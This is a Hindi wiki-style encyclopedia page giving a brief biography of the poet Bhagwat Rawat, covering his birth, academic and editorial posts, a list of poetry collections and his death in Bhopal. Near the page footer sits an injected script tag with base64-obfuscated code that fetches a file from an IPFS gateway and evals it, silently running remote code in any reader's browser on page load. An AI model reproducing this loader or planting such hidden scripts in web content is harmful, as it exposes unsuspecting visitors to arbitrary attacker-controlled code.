भगवत रावत

भारत डिस्कवरी प्रस्तुति
Revision as of 11:29, 3 January 2015 by गोविन्द राम (talk | contribs) (''''भगवत रावत''' (अंग्रेज़ी: ''Bhagwat Rawat'' जन्म: 13 सितंबर, 1939 - ...' के साथ नया पन्ना बनाया)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search

भगवत रावत (अंग्रेज़ी: Bhagwat Rawat जन्म: 13 सितंबर, 1939 - मृत्यु: 25 मई, 2012) एक प्रगतिशील कवि एवं निबन्ध लेखक थे। भगवत रावत मध्य प्रदेश प्रगतिशील लेखक संघ के अध्यक्ष और वसुधा पत्रिका के संपादक भी रहे। भगवत रावत समकालीन हिन्दी कविता के शीर्षस्थ कवि, साहित्यकार और मेहनतकश मजदूरों के प्रतिनिधि कवि के रूप में प्रसिद्ध रहे।

जीवन परिचय

भगवत रावत का जन्म 13 सितंबर 1939 को टेहेरका, टीकमगढ़, मध्य प्रदेश में हुआ। भगवत रावत की शिक्षा एम.ए. बी.एड है।

कार्यक्षेत्र

1983 से 1994 तक हिन्दी के रीडर पद पर कार्य के बाद दो वर्ष तक ‘मध्य प्रदेश हिन्दी ग्रंथ अकादमी’ के संचालक रहे। 1998 से 2001 तक क्षेत्रीय शिक्षा संस्थान, भोपाल में हिन्दी के प्रोफेसर तथा समाज विज्ञान और मानिविकी शिक्षा विभाग के अध्यक्ष रहे। भगवत रावत साहित्य अकादमी, मध्य प्रदेश परिषद् के निदेशक भी रहे एवं मासिक पत्रिका ‘साक्षात्कार’ का संपादन भी किया।

प्रमुख कृतियाँ

कविता संग्रह
  • समुद्र के बारे में (1977)
  • दी हुई दुनिया (1981)
  • हुआ कुछ इस तरह (1988)
  • सुनो हिरामन (1992)
  • सच पूछो तो (1996)
  • बिथ-कथा (1997)
  • हमने उनके घर देखे (2001)
  • ऐसी कैसी नींद (2004)
  • निर्वाचित कविताएं (2004)
आलोचना
  • कविता का दूसरा पाठ (1993)

सम्मान और पुरस्कार

निधन

भगवत रावत का निधन 25 मई, 2012 को मध्य प्रदेश की राजधानी भोपाल में हुआ।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

बाहरी कड़ियाँ

सम्बंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


वर्णमाला क्रमानुसार लेख खोज

                              अं                                                                                                       क्ष    त्र    ज्ञ             श्र   अः